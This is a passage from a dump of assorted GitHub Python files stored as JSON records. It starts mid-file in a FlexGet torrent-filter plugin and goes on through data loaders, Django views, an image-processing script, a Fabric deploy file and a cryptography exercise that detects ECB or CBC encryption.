return\r\n\r\n if len(leechers) not in range(leecher_min, leecher_max + 1):\r\n _entry.reject('%d is out of range of leecher' % len(leechers)) # 下载人数不匹配\r\n return\r\n\r\n max_complete = max(leechers, key=lambda x: x['completed'])['completed']\r\n if max_complete > config['leechers']['max_complete']:\r\n _entry.reject('%f is more than max_complete' % max_complete) # 最大完成度不匹配\r\n return\r\n\r\n _entry.accept()\r\n\r\n futures = [] # 线程任务\r\n with concurrent.futures.ThreadPoolExecutor(max_workers=5) as executor:\r\n for entry in task.entries:\r\n link = entry.get('link')\r\n if not link:\r\n raise plugin.PluginError(\"The rss plugin require 'other_fields' which contain 'link'. \"\r\n \"For example: other_fields: - link\")\r\n futures.append(executor.submit(consider_entry, entry, link))\r\n\r\n concurrent.futures.as_completed(futures)\r\n\r\n @staticmethod\r\n # 解析页面,获取优惠、做种者信息、下载者信息\r\n def info_from_page(detail_page, peer_page):\r\n soup = get_soup(detail_page.content)\r\n try:\r\n discount_class = soup.find('h1', id='top').b.font['class'][0] # selector: '#top > b:nth-child(1) > font'\r\n discount_table = {\r\n 'free': 'free',\r\n 'twoup': '2x',\r\n 'twoupfree': '2xfree',\r\n 'thirtypercent': '30%',\r\n 'halfdown': '50%',\r\n 'twouphalfdown': '2x50%'\r\n }\r\n discount = discount_table[discount_class]\r\n except AttributeError:\r\n discount = None # 无优惠\r\n\r\n def get_peers(table):\r\n peers = []\r\n for index, tr in enumerate(table.find_all('tr')):\r\n if index != 0:\r\n try:\r\n tds = tr.find_all('td')\r\n peers.append({\r\n 'name': tds[0].get_text(),\r\n 'connectable': True if tds[1].get_text() != '是' else False,\r\n 'uploaded': tds[2].get_text(),\r\n 'downloaded': tds[4].get_text(),\r\n 'completed': float(tds[7].get_text().strip('%')) / 100\r\n # 'completed': tds[7].get_text()\r\n })\r\n except IndexError:\r\n pass\r\n except ValueError:\r\n pass\r\n return peers\r\n\r\n soup = get_soup(peer_page.content)\r\n tables = soup.find_all('table', limit=2)\r\n seeders = get_peers(tables[0])\r\n leechers = get_peers(tables[1])\r\n\r\n return discount, seeders, leechers\r\n\r\n @staticmethod\r\n def _get_info(task, link, cookie):\r\n detail_page = task.requests.get(link, headers={'cookie': cookie}) # 详情\r\n peer_url = link.replace('details.php', 'viewpeerlist.php', 1)\r\n peer_page = task.requests.get(peer_url, headers={'cookie': cookie}) # peer详情\r\n return NexusPHP.info_from_page(detail_page, peer_page)\r\n\r\n\r\n@event('plugin.register')\r\ndef register_plugin():\r\n plugin.register(NexusPHP, 'nexusphp', api_ver=2)\r\n","repo_name":"CrossStone/flexget-nexusphp","sub_path":"nexusphp.py","file_name":"nexusphp.py","file_ext":"py","file_size_in_byte":6409,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"37"} +{"seq_id":"5561476292","text":"import os\nfrom datamodules.abstractdm import AbstractDataModule\nimport numpy as np\nimport torch\nfrom torch.utils.data import Dataset, DataLoader\nimport pytorch_lightning as pl\nimport matplotlib.pyplot as plt\n\n# code adapted from https://www.kaggle.com/code/eranartzi/notmnist-cnn-3-conv2d-3-pooling-2-fc\ndef convert_to_pandas(dir_, letters):\n # Retrieve pictures files names\n pictures_files = {}\n for letter in letters:\n images = [name for name in os.listdir(str(dir_) + '/' + letter) if name[-4:] == '.png']\n pictures_files[letter] = images\n\n # print(pictures_files)\n # Get the actual pictures\n data = {}\n for letter in letters:\n images = []\n for name in pictures_files[letter]:\n try:\n images.append(plt.imread(str(dir_)+'/{}/{}'.format(letter, name)))\n except Exception as e:\n print(e)\n print(str(dir_)+'/{}/{}'.format(letter, name))\n data[letter] = images\n break\n\n # Merge all data to one list\n X = []\n Y = []\n X_nd = np.zeros(shape=(18724, 784))\n Y_nd = np.zeros(shape=(18724))\n for key, list_ in data.items():\n for img in list_:\n X.append(img.reshape(-1))\n Y.append(key)\n X = np.array(X)\n Y = np.array([mapping[x] for x in Y])\n\n return pd.DataFrame(X, Y).reset_index()\n\nmapping = {\n 'A': 0,\n 'B': 1,\n 'C': 2,\n 'D': 3,\n 'E': 4,\n 'F': 5,\n 'G': 6,\n 'H': 7,\n 'I': 8,\n 'J': 9\n}\n\nclass NotMNISTDataset(Dataset):\n\n def __init__(self, path='/u/home/korth/notMNIST_small/', transform=None):\n letters = os.listdir(path)\n self.df = convert_to_pandas(path, letters)\n\n self.images = self.df.iloc[:, 1:].valuues.reshape((-1, 1, 28, 28))\n self.targets = self.df.iloc[:, 0].values\n\n self.transform = transform\n\n def __len__(self):\n return len(self.targets)\n\n def __getitem__(self, idx):\n x = self.images[idx].squeeze()\n if self.transform:\n x = self.transform(x)\n y = self.targets[idx]\n return x, y\n\n\nidx_to_class = {\n 0: 'A',\n 1: 'B',\n 2: 'C',\n 3: 'D',\n 4: 'E',\n 5: 'F',\n 6: 'G',\n 7: 'H',\n 8: 'I',\n 9: 'J'\n}\n\n\nclass NotMNISTDataModule(AbstractDataModule):\n\n def __init__(self, **kwargs):\n super().__init__()\n\n def _setup(self, positive_class=-1):\n self.test_dataset = NotMNISTDataset(\n transform=self.hparams.test_transform)\n\n def train_dataloader(self):\n raise Exception('NotMNIST only supports a test_dataloader()')\n\n def val_dataloader(self):\n raise Exception('NotMNIST only supports a test_dataloader()')\n\n def test_dataloader(self):\n return DataLoader(\n self.test_dataset,\n batch_size=self.hparams.batch_size,\n num_workers=self.hparams.dataloader_num_workers,\n shuffle=False)\n\n def map_idx_to_class(self, number):\n return idx_to_class[number]\n","repo_name":"danielkorth/OOD-Detection-using-One-vs-All-Classifiers","sub_path":"datamodules/notmnist.py","file_name":"notmnist.py","file_ext":"py","file_size_in_byte":2988,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"35738133005","text":"\"\"\" Contains dotnet utilities \"\"\"\n\nimport devops_toolset.tools.cli\nfrom devops_toolset.core.app import App\nfrom devops_toolset.core.LiteralsCore import LiteralsCore\nfrom devops_toolset.project_types.dotnet.Literals import Literals as DotnetLiterals\nfrom devops_toolset.core.CommandsCore import CommandsCore\nfrom devops_toolset.project_types.dotnet.commands import Commands as DotnetCommands\n\napp: App = App()\nliterals = LiteralsCore([DotnetLiterals])\ncommands = CommandsCore([DotnetCommands])\n\n\ndef build(path: str, configuration: str = \"Release\", output: str = \".\", framework: str = \"net5.0\",\n runtime: str = \"linux-x64\", with_restore: bool = False, force: bool = False, debug: bool = False):\n \"\"\" Performs a dotnet build in the desired path\n Arguments:\n path: The path where build will be executed.\n configuration: The configuration used for build. Default is \"Release\".\n output: Adds --output argument. Specifies the output path of the build command. Defaults \".\"\n framework: The dotnet framework used to build. Default is \"net5.0\".\n runtime: The runtime used to build. Default is \"linux-x64\".\n with_restore: Adds --no-restore argument when False. Default to False.\n force: Adds --force argument.\n debug: Enables diagnostic logs to the command.\n\n More info: https://docs.microsoft.com/es-es/dotnet/core/tools/dotnet-build\n\n \"\"\"\n devops_toolset.tools.cli.call_subprocess(commands.get(\"dotnet_build\").format(\n force=convert_force_parameter(force),\n path=path,\n debug=convert_debug_parameter(debug),\n configuration=configuration,\n output=output,\n framework=framework,\n runtime=runtime,\n with_restore=convert_with_restore_parameter(with_restore)),\n log_before_process=[literals.get(\"dotnet_build_before\").format(path=path)],\n log_after_err=[literals.get(\"dotnet_build_err\").format(path=path)])\n\n\ndef convert_debug_parameter(value: bool) -> str:\n \"\"\" Converts force boolean into the correspondent parameter\n Arguments:\n value: The value to be converted\n\n Returns: --force when true, empty value otherwise\n \"\"\"\n if value:\n return \"--verbosity=diagnostic\"\n return \"\"\n\n\ndef convert_force_parameter(value: bool) -> str:\n \"\"\" Converts force boolean into the correspondent parameter\n Arguments:\n value: The value to be converted\n\n Returns: --force when true, empty value otherwise\n \"\"\"\n if value:\n return \"--force\"\n return \"\"\n\n\ndef convert_with_restore_parameter(value: bool) -> str:\n \"\"\" Converts with_restore boolean into the correspondent parameter\n Arguments:\n value: The value to be converted\n\n Returns: --no-restore when false, empty value otherwise\n \"\"\"\n if not value:\n return \"--no-restore\"\n return \"\"\n\n\ndef restore(path: str, force: bool = False, debug: bool = False):\n \"\"\" Performs a dotnet restore in the desired path\n Arguments:\n path: The path where restore will be executed.\n force: Adds --force argument.\n debug: Enables diagnostic logs to the command.\n\n More info: https://docs.microsoft.com/es-es/dotnet/core/tools/dotnet-restore\n\n \"\"\"\n devops_toolset.tools.cli.call_subprocess(commands.get(\"dotnet_restore\").format(\n force=convert_force_parameter(force),\n path=path,\n debug=convert_debug_parameter(debug)),\n log_before_process=[literals.get(\"dotnet_restore_before\").format(path=path)],\n log_after_err=[literals.get(\"dotnet_restore_err\").format(path=path)])\n\n\nif __name__ == \"__main__\":\n help(__name__)\n","repo_name":"aheadlabs/devops-toolset","sub_path":"src/devops_toolset/project_types/dotnet/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":3632,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"37"} +{"seq_id":"43064141041","text":"#!/usr/bin/python\n#coding=utf-8\n#encoding=utf8\nimport sys\nreload(sys)\nsys.setdefaultencoding('utf8')\n\nimport pandas as pd\n\nif __name__ == '__main__':\n user_name = '雾里看花113'\n df = pd.read_csv('data/all_order.csv',encoding='utf-8')\n nomissing_df = df.dropna().reset_index(drop=True)\n spec_df = nomissing_df[nomissing_df['member_nick_name']==user_name].copy()\n spec_df['order_create_time'] = pd.to_datetime(spec_df['order_create_time'])\n spec_df.sort_values('order_create_time',inplace=True)\n spec_df.to_csv('user_specific/'+user_name+'_order.csv',encoding='utf_8_sig',index=False)","repo_name":"forevergogi/bias_svd_with_numpy","sub_path":"utils/data_analysis.py","file_name":"data_analysis.py","file_ext":"py","file_size_in_byte":607,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"72182518827","text":"from django.shortcuts import render, redirect\nfrom . forms import SignupForm\n\n\n# Create your views here.\ndef signup(request):\n if request.method == 'POST':\n form = SignupForm(request.POST)\n if form.is_valid():\n form.save()\n return redirect('/home')\n else:\n form = SignupForm()\n context = {'form': form}\n return render(request, 'registration/register.html', context)\n","repo_name":"jubins/Cornershop-Meals","sub_path":"cornershopmeals/employees/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":417,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70519705707","text":"from django.shortcuts import render, redirect, get_object_or_404\r\n\r\nfrom django.http import HttpResponse, Http404\r\n\r\nfrom handstats.models import *\r\n\r\ndef existing_decks(request):\r\n\tcontext = {}\r\n\t\r\n\tif 'hero' in request.GET and request.GET['hero'] != '':\r\n\t\tdecks = Deck.objects.filter(hero=request.GET['hero'])\r\n\t\tcontext['decks'] = decks\r\n\t\tcontext['selectable'] = True\r\n\t\treturn render(request, 'decks.json', context, content_type='application/json')\r\n\telse:\r\n\t\tdecks = Deck.objects.order_by('hero')\r\n\t\tcontext['decks'] = decks\r\n\t\tcontext['selectable'] = False\r\n\t\treturn render(request, 'existing_decks.html', context)\r\n\t\r\n\t\r\ndef create_deck(request):\r\n\tcontext = {}\r\n\treturn render(request, 'create_deck.html', context)\r\n\t\r\ndef get_deck_list(request, deck_id):\r\n\tdeck = get_object_or_404(Deck, id=deck_id)\r\n\t\r\n\tcontext = {}\r\n\tcontext['deck'] = deck\r\n\t\r\n\treturn render(request, 'deck_list.html', context)\r\n\t\r\n\t","repo_name":"ValentinMoullet/hearthstone","sub_path":"hearthstone/handstats/decks/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":914,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"32373039853","text":"n = int(input())\na = list(map(int, input().split()))\na.insert(0, 0)\n\ninf = 1000000000\n\ndp = [[inf for col in range(4)] for row in range(n+1)]\nprv = [[0 for col in range(4)] for row in range(n+1)]\n\ndp[0][0] = 1\nfor i in range(1, n+1):\n for j in range(0, 4):\n if dp[i-1][j] <= a[i] and dp[i][j] > a[i]:\n dp[i][j] = a[i]\n prv[i][j] = j\n if j > 0 and dp[i][j] > dp[i-1][j-1]:\n dp[i][j] = dp[i-1][j-1]\n prv[i][j] = j-1\n\nisFinished = False\nfor ti in range(0, 4):\n if dp[n][ti] == inf:\n continue\n print(\"YES\")\n print(ti)\n i, j = n, ti\n while i > 0:\n if prv[i][j] == j-1:\n print(i, dp[i][j])\n j = prv[i][j]\n i -= 1\n isFinished = True\n break\n\nif not isFinished:\n print(\"NO\")","repo_name":"justiceHui/Sunrin-Contest","sub_path":"Sunrin-ICPC-2021/Final-A/FA.py","file_name":"FA.py","file_ext":"py","file_size_in_byte":789,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"37"} +{"seq_id":"40184969478","text":"def car_info(manufacturer, model, **features):\n \"\"\"Building a car dictionary to store various cars and their features\"\"\"\n car_profile = {}\n car_profile[\"manufacturer\"] = manufacturer\n car_profile[\"model\"] = model\n for k, v in features.items():\n car_profile[k] = v\n return car_profile\n\n\ntoyota = car_info(\"toyota\", \"camry\",\n year=2014,\n color=\"black\",\n navigation=\"yes\",\n rear_camera=\"yes\",\n price=21000)\n\nprint(toyota)\n \n","repo_name":"ojenksdev/python_crash_course","sub_path":"car_build.py","file_name":"car_build.py","file_ext":"py","file_size_in_byte":548,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"2230766710","text":"#! /bin/python3\nimport socketserver\nimport http.server\n\nclass MyHTTP(http.server.SimpleHTTPRequestHandler):\n def handle_one_request(self):\n print(self)\n print(self.client_address[0])\n return super().handle_one_request()\nhttpd = socketserver.TCPServer((\"\", 8000), MyHTTP)\n\nprint(\"Now serving HTTP server on port 8000\")\n\nwhile True:\n httpd.handle_request()\n","repo_name":"Cmorling/MySimpleHTTPServer","sub_path":"SimpleHTTPExtension.py","file_name":"SimpleHTTPExtension.py","file_ext":"py","file_size_in_byte":382,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"3896516420","text":"# coding: utf-8\nfrom datetime import datetime\nfrom snowballing.models import *\nfrom ..places import *\n\no2005a = DB(Work(\n 2005, \"A decentralised approach to electronic consent and health information access control\",\n due=\"unrelated to GDPR\",\n display=\"o\",\n authors=\"O'Keefe, Christine M and Greenfield, Paul and Goodchild, Andrew\",\n place=JRPIT,\n ID='o2005decentralised',\n category='unrelated',\n cluster_id='13336104715367539653',\n entrytype='article',\n link='https://citeseerx.ist.psu.edu/viewdoc/download?doi=10.1.1.86.4850&rep=rep1&type=pdf',\n number='2',\n pp='161--178',\n scholar='https://scholar.google.com/scholar?cites=13336104715367539653&as_sdt=2005&sciodt=0,5&hl=en',\n scholar_id='xePktpRcE7kJ',\n scholar_ok=True,\n volume='37',\n backward_steps=1,\n))\n","repo_name":"danielpcampagna/master-the-state-of-the-art","sub_path":"database/work/y2005.py","file_name":"y2005.py","file_ext":"py","file_size_in_byte":811,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"71157870454","text":"import numpy as np\r\nimport imageio\r\nimport math\r\nimport cv2\r\nimport matplotlib.pyplot as plt\r\nimg = cv2.imread('D:\\\\hough.jpg',0)\r\nwidth, height = img.shape\r\ndiaglen = int(round(math.sqrt(width * width + height * height)))\r\n\r\ndef hough_line(img):\r\n thetas = np.deg2rad(np.arange(-90.0, 90.0, 1))\r\n width, height = img.shape\r\n diaglen = int(round(math.sqrt(width * width + height * height)))\r\n rs = np.linspace(-diaglen, diaglen, diaglen * 2)\r\n cost = np.cos(thetas)\r\n sint = np.sin(thetas) \r\n accumulator = np.zeros((2 * diaglen, len(thetas)), dtype=np.uint8)\r\n y_id, x_id = np.nonzero(img)\r\n for i in range(len(x_id)):\r\n x = x_id[i]\r\n y = y_id[i]\r\n for teta in range(len(thetas)):\r\n r = diaglen + int(round(x * cost[teta] + y * sint[teta]))\r\n accumulator[r, teta] += 1\r\n return accumulator, thetas, rs\r\n\r\ndef sobel(img):\r\n# define gaussian kernels\r\n ksv=[[1,0,-1],[2,0,-2],[1,0,-1]]\r\n ksh=[[1,2,1],[0,0,0],[-1,-2,-1]]\r\n\r\n###################sobel edge detection######################################\r\n# function for convolution.\r\n def convolu(ker):\r\n ksf=[[0 for j in range(len(ker[0]))] for i in range(len(ker))] \r\n \r\n#flipping the kernel\r\n for i in range(len(ker)):\r\n for j in range(len(ker[0])):\r\n ksf[i][j]=ker[len(ker)-i-1][len(ker)-j-1] \r\n \r\n#convolution \r\n res=[[0 for j in range(len(gray[0]))] for i in range(len(gray))]\r\n kh=len(ksf)//2\r\n kw=len(ksf[0])//2\r\n ih=len(gray)\r\n iw=len(gray[0])\r\n for i in range(kh,ih-kh):\r\n for j in range(kw,iw-kw):\r\n x=0\r\n for l in range(len(ksf)):\r\n for k in range(len(ksf[0])):\r\n x = x+ gray[i-kh+l][j-kw+k]*ksf[l][k] \r\n res[i][j]=x \r\n return res \r\n\r\n#method 2 for eliminating zeros\r\n def eliminate2(resl):\r\n for i in range(len(resl)):\r\n resl[i]=[abs(j) for j in resl[i]]\r\n maximum = max([max(j) for j in resl])\r\n for i in range(len(resl)):\r\n resl[i][:] = [x / maximum for x in resl[i]]\r\n return resl\r\n gray = img \r\n reslh=convolu(ksh) \r\n reslv=convolu(ksv)\r\n reslho = eliminate2(reslh)\r\n reslho = np.asarray(reslho)\r\n reslve = eliminate2(reslv) \r\n reslve = np.asarray(reslve)\r\n for i in range(len(reslve)): \r\n for j in range(len(reslve[0])):\r\n if(reslve[i][j]>0.1):\r\n reslve[i][j] = 1\r\n else:\r\n reslve[i][j] = 0\r\n return reslve,reslho\r\n\r\n###################MAIN FOR LINES#################################################################\r\naccu = []\r\nimgpath = 'D:\\\\hough.jpg'\r\ntran = imageio.imread(imgpath) \r\ntran1 = imageio.imread(imgpath)\r\nimg = cv2.imread('D:\\\\hough.jpg',0) #read image as as gray\r\nimg,reslho = sobel(img)\r\ncv2.imshow('imcan.png',img) \r\naccumulator, thetas, rhos = hough_line(img)\r\nprint(accumulator)\r\nprint('over')\r\nprint(img.shape)\r\nfor i in range(len(accumulator)):\r\n for j in range(len(accumulator[0])):\r\n if(accumulator[i][j]>195):\r\n accu.append([thetas[j],rhos[i]])\r\naccu = np.asarray(accu)\r\nprint(accu)\r\n\r\nfor theta,r in accu: \r\n a = np.cos(theta) \r\n b = np.sin(theta) \r\n x0 = a*r \r\n y0 = b*r \r\n x1 = int(x0 + 2000*(-b)) \r\n y1 = int(y0 + 2000*(a)) \r\n x2 = int(x0 - 2000*(-b)) \r\n y2 = int(y0 - 2000*(a)) \r\n# thetamap = np.deg2rad(theta)\r\n if(-2.10865238e-01<=theta<=2.10865238e-01):\r\n cv2.line(tran,(x1,y1), (x2,y2), (0,0,255),2)\r\n else:\r\n cv2.line(tran1,(x1,y1), (x2,y2), (255,0,0),2)\r\n \r\ncv2.imwrite('D:\\\\red_lines.jpg', tran) \r\ncv2.imwrite('D:\\\\blue_lines.jpg', tran1)\r\n\r\n\r\n############################# CIRCLE DETECTION ######################################################################\r\n\r\ndef detectCircles(img,threshold,region,radius = None):\r\n (M,N) = img.shape\r\n if radius == None:\r\n R_max = np.max((M,N))\r\n R_min = 3\r\n else:\r\n [R_max,R_min] = radius\r\n\r\n R = R_max - R_min\r\n A = np.zeros((R_max,M+2*R_max,N+2*R_max))\r\n B = np.zeros((R_max,M+2*R_max,N+2*R_max))\r\n theta = np.arange(0,360)*np.pi/180\r\n edges = np.argwhere(img[:,:]) \r\n for val in range(R):\r\n r = R_min+val\r\n bprint = np.zeros((2*(r+1),2*(r+1)))\r\n (m,n) = (r+1,r+1) \r\n for angle in theta:\r\n x = int(np.round(r*np.cos(angle)))\r\n y = int(np.round(r*np.sin(angle)))\r\n bprint[m+x,n+y] = 1\r\n constant = np.argwhere(bprint).shape[0]\r\n for x,y in edges: \r\n X = [x-m+R_max,x+m+R_max] \r\n Y= [y-n+R_max,y+n+R_max] \r\n A[r,X[0]:X[1],Y[0]:Y[1]] += bprint\r\n A[r][A[r]17):\r\n circle.append(plt.Circle((y,x),r,color=(1,0,0),fill=False))\r\n fig.add_subplot(111).add_artist(circle[-1])\r\n plt.show()\r\n plt.savefig('D:\\\\coin.jpg')\r\n \r\n############################################main for circles######################################### \r\nfile_path = 'D:\\\\hough.jpg'\r\nres = img \r\nfor i in range(len(reslho)): \r\n for j in range(len(reslho[0])):\r\n if(reslho[i][j]>0.1):\r\n res[i][j] = 1\r\n else:\r\n res[i][j] = 0\r\n\r\nres = detectCircles(res,11,20,radius=[50,15])\r\ndisplayCircles(res)\r\n\r\n","repo_name":"srujan-kothapally/Morphology_Image-segmentation_point-detection_Hough-transform","sub_path":"Hough transform/proj3 task3.py","file_name":"proj3 task3.py","file_ext":"py","file_size_in_byte":6211,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"3542265116","text":"import boto3\n\nsession =boto3.Session(profile_name=\"aws_root\")\n\ndef get_client():\n s=session.resource('s3')\n return s\n\ndef list_s3_buckets():\n\n s= get_client()\n\n for bucket in s.buckets.all():\n print(bucket.name)\n\ndef list_s3_objects(bucket):\n\n s= get_client()\n bucket = s.Bucket(bucket)\n ob=[]\n\n for o in bucket.objects.all():\n ob.append(o.key)\n return (ob)\n\ndef put_object_to_s3(key,body):\n s = get_client()\n #s.Bucket('ayush-third-bucket').put_object(Key='beta2', Body='beta2file')\n s.Bucket('ayush-third-bucket').put_object(Key=key, Body=body)\n return(key)\n\nlist_s3_objects('ayush-third-bucket')\n#put_object_to_s3('beta3','beta3file')","repo_name":"ayushkr07/boto-moto","sub_path":"mycode.py","file_name":"mycode.py","file_ext":"py","file_size_in_byte":690,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"23792746515","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Dec 5 13:12:45 2021\n\n@author: mhz\n\"\"\"\n\n# Density and porosity because no neutron, but it has a color map\nfig = plt.subplots(figsize=(7,10))\n\nax1 = plt.subplot2grid((1,1), (0,0), rowspan=1, colspan=1)\nax2 = ax1.twiny()\n\nax1.plot('RHOB', 'DEPTH', data=df, color='red', lw=0.5)\nax1.set_xlim(1.44, 2.8)\nax1.set_xlabel('Density')\nax1.xaxis.label.set_color(\"red\")\nax1.tick_params(axis='x', colors=\"red\")\nax1.spines[\"top\"].set_edgecolor(\"red\")\n\nax2.plot('CNPOR', 'DEPTH', data=df, color='blue', lw=0.5)\nax2.set_xlim(58, 1.6)\nax2.set_xlabel('Porosity (%)')\nax2.xaxis.label.set_color(\"blue\")\nax2.spines[\"top\"].set_position((\"axes\", 1.08))\nax2.tick_params(axis='x', colors=\"blue\")\nax2.spines[\"top\"].set_edgecolor(\"blue\")\n\nx1=df['RHOB']\nx2=df['CNPOR']\n\nx = np.array(ax1.get_xlim())\nz = np.array(ax2.get_xlim())\n\nnz=((x2-np.max(z))/(np.min(z)-np.max(z)))*(np.max(x)-np.min(x))+np.min(x)\n\nax1.fill_betweenx(df['DEPTH'], x1, nz, where=x1>=nz, interpolate=True, color='green')\nax1.fill_betweenx(df['DEPTH'], x1, nz, where=x1<=nz, interpolate=True, color='yellow')\n\nfor ax in [ax1, ax2]:\n ax.set_ylim(4400, 2500)\n ax.xaxis.set_ticks_position(\"top\")\n ax.xaxis.set_label_position(\"top\")","repo_name":"MhzQa/PETE_219_GROUP_PROJ","sub_path":"Density And Porosity logs.py","file_name":"Density And Porosity logs.py","file_ext":"py","file_size_in_byte":1244,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"23024052113","text":"from fabric.api import local, run, env, put\nenv.graceful = False\n\nenv.user = 'mushfiq'\nenv.site_root = '/var/www/news'\n\ndef server():\n\n # env.serverpath = ''\n\n # env.password = '' #ssh password for user \n # env.key_filename = ''# specify server public key\n #lis of hossts in env.hosts\n env.hosts = [\n 'shironambd.com',\n ]\n \n env.graceful = False\n\n \n#sample method for git pull\ndef pull(branch_name):\n\tenv.site_root = 'your_project_path'\n\trun('cd %s && git pull origin %s' % (env.site_root, branch_name))\n \n#deploy current directories all code without fabfile.py\t\ndef deploy():\n\tenv.files = '*'\n\tenv.site_name = 'shironambd'\n\tenv.site_path = '/var/www/news'\n\trun('sudo rm -rf %s/%s' % (env.site_path,env.site_name))\n\tlocal('zip -r %s.zip -x=fabfile.py %s' % (env.site_name, env.files))\n\tput('%s.zip' % env.site_name, env.site_root, use_sudo=True)\n\trun('cd %s && sudo unzip %s.zip -d %s && sudo rm %s.zip' % (env.site_root, \\\n\tenv.site_name, env.site_name, env.site_name))\n\tlocal('rm -rf %s.zip' % env.site_name)\n\t\n\t\n#restart apache of remote host\ndef restart_apache():\n cmd = \"/usr/local/apache2/bin/apachectl -k graceful\" if (env.graceful is True) \\\n else \"service httpd restart\"\n run(cmd)\n \ndef latest_access_log():\n\tcmd = \"sudo tail -n 10 /var/log/apache2/access.log\"\n\trun(cmd)\n\t\ndef latest_error_log():\n\tcmd = \"sudo tail -n 10 /var/log/apache2/error.log\"\n\trun(cmd)\n\t\ndef clone():\n\tgit_path = \"git@github.com:mushfiq/shironambd.git\"\n\trun('cd /var/www/testFab && git clone %s' % git_path)\n","repo_name":"mushfiq/shironambd","sub_path":"fabfile.py","file_name":"fabfile.py","file_ext":"py","file_size_in_byte":1541,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"73601156211","text":"n, a, b, c=map(int, input().split())\nmy = [a,b,c]\nmy = sorted(my)\ncount = 0\na,b,c= map(int, my)\nif n%a ==0:\n count+=(n/a)\nelse:\n count += (n/a)\n val= n\n for i in range(n/b):\n count -= i\n \n \nprint(count)","repo_name":"Fahad-CSE16/ProblemSolving","sub_path":"189a.py","file_name":"189a.py","file_ext":"py","file_size_in_byte":235,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"42863738141","text":"import datetime\r\nimport random\r\ndef printTimeStamp(name):\r\n print(\"Автор програми: \" + name)\r\n print(\"Час компіляції: \" + str(datetime.datetime.now()),\"\\n\")\r\nprintTimeStamp(\"Kharchenko Vasil\")\r\n\r\n\r\ndef пароль():\r\n пас = ('')\r\n for i in range(random.randint(8,17)):\r\n пас += chr(random.randint(33, 127))\r\n print(пас.encode(\"ascii\"))\r\n\r\nfor i in range(10):\r\n пароль()\r\n\r\n\r\n\r\n","repo_name":"ForemanAqua/PythonFiles1","sub_path":"Практика2018/3 den/Уровень А/3.py","file_name":"3.py","file_ext":"py","file_size_in_byte":445,"program_lang":"python","lang":"uk","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"20227648991","text":"import utils\nfrom random import randint\n\nBLOCKSIZE = 16\n\ndef encryption_oracle(plain):\n\tprefix = utils.randomString(randint(5, 10))\n\tsuffix = utils.randomString(randint(5, 10))\n\tif randint(0, 1) == 0:\n\t\treturn utils.AES_ECB_encrypt(utils.randomString(BLOCKSIZE), prefix + plain + suffix), \"ECB\"\n\telse:\n\t\treturn utils.AES_CBC_encrypt(utils.randomString(BLOCKSIZE), utils.randomString(BLOCKSIZE), prefix + plain + suffix), \"CBC\"\n\t\n\nfor idx in range(10):\n\tcipher, method = encryption_oracle(b\"A\"*43)\n\t\n\tif cipher[BLOCKSIZE:BLOCKSIZE*2] == cipher[BLOCKSIZE*2:BLOCKSIZE*3]:\n\t\tmethodGuess = \"ECB\"\n\telse:\n\t\tmethodGuess = \"CBC\"\n\t\t\n\tprint(methodGuess == method)\n\t","repo_name":"max644/matasano","sub_path":"11.py","file_name":"11.py","file_ext":"py","file_size_in_byte":654,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"30116845052","text":"import os\n\nfrom django.conf import settings\nfrom django.http import JsonResponse\nfrom django.shortcuts import render\nfrom django.views import View\n\nfrom cyberdevice.accountUtils import get_access_token\n\n# load da list\ndef get_da_list():\n dirs = os.listdir(os.path.join('', 'cyberdevice/templates/da'))\n return [da.replace('.html', '') for da in dirs if '.html' in da]\n\n# load vp list\ndef get_vp_list():\n return os.listdir(os.path.join('', 'cyberdevice/static/vp'))\n\n\nclass Index(View):\n template_name = 'cyberdevice/index.html'\n\n def get(self, request, *args, **kwargs):\n return render(\n request,\n self.template_name,\n {\n 'da_list': get_da_list(),\n 'vp_list': get_vp_list(),\n }\n )\n\n\nclass EcEndpoint(View):\n def get(self, request, *args, **kwargs):\n return JsonResponse({\"ec_endpoint\": settings.EC_ENDPOINT})\n\n\nclass CyberDevice(View):\n template_name = 'da/{}.html'\n\n def _render(self, request, da_name):\n return render(\n request,\n self.template_name.format(da_name),\n {\n 'da_name': da_name,\n 'ec_endpoint': settings.EC_ENDPOINT,\n 'ag_endpoint': settings.AG_ENDPOINT,\n 'ag_username': settings.AG_USERNAME,\n 'ag_password': settings.AG_PASSWORD,\n 'ag_access_token': get_access_token(),\n }\n )\n\n def get(self, request, *args, **kwargs):\n da_name = self.kwargs['da_name']\n return self._render(request, da_name)\n\n\nclass VPython(View):\n template_name = 'vp/base.html'\n\n def _render(self, request, vp_name):\n return render(\n request,\n self.template_name,\n {\n 'vp_name': vp_name,\n 'ec_endpoint': settings.EC_ENDPOINT,\n 'ag_endpoint': settings.AG_ENDPOINT,\n 'ag_username': settings.AG_USERNAME,\n 'ag_password': settings.AG_PASSWORD,\n 'ag_access_token': get_access_token(),\n }\n 